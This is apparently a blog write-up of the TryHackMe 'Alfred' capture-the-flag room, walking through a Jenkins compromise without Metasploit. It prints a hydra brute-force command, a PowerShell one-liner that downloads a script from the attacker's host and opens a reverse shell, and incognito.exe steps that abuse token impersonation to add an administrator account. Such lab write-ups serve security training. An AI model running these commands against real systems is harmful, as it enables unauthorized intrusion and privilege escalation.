TryHackMe — Alfred w/o MSF

Exploit Jenkins to gain an initial shell, then escalate your privileges by exploiting Windows authentication tokens.

Image for post
Image for post

[1]NMAP Scan

sudo nmap -A -T4 10.10.131.184 -oN nmap_alfred

Image for post
Image for post

[2]Visit Webpage

http://10.10.131.184:8080

Image for post
Image for post

[3]Brute force login page

Capture login traffic using burpsuite:

Image for post
Image for post
Image for post
Image for post

Brute form http-post-form using hydra:

Parameters for Hydra:

URL: /j_acegi_security_check
USER = j_username
PASS = j_password
Port = 8080
Invalid login message = Invalid username or password

hydra -s 8080 10.10.131.184 http-form-post “/j_acegi_security_check:j_username=^USER^&j_password=^PASS^:Invalid username or password” -L user.txt -P rockyou.txt -t 10 -w 30

Image for post
Image for post

[4]Login to webpage using gathered credentials

Image for post
Image for post
Image for post
Image for post

[5]Setup a python web server and netcat listener on kali

Image for post
Image for post

[6]Download and run Invoke-PowerShellTcp.ps1 to target machine

powershell iex (New-Object Net.WebClient).DownloadString(‘http://10.11.17.48:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.11.17.48 -Port 1337

Image for post
Image for post
Image for post
Image for post
Image for post
Image for post

[6]Escalate privilege

whoami /priv

Image for post
Image for post

[7]Exploit SeImpersonatePrivilege using incognito.exe

powershell “(New-Object System.Net.WebClient).Downloadfile(‘http://10.11.17.48:8000/incognito.exe','incognito.exe')"

Image for post
Image for post

./incognito.exe add_user dummy pass123

./incognito.exe add_localgroup_user Administrators dummy

Image for post
Image for post

[8]Login to RDP using dummy account

rdesktop -u dummy -p pass123 10.10.131.184

Image for post
Image for post

run cmd as Administrator

Image for post
Image for post
Image for post
Image for post

References:

https://tryhackme.com/room/alfred

https://labs.mwrinfosecurity.com/assets/BlogFiles/incognito2.zip

Written by

Experienced Network Security Engineer with a demonstrated history of working in the field of IT security industry.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store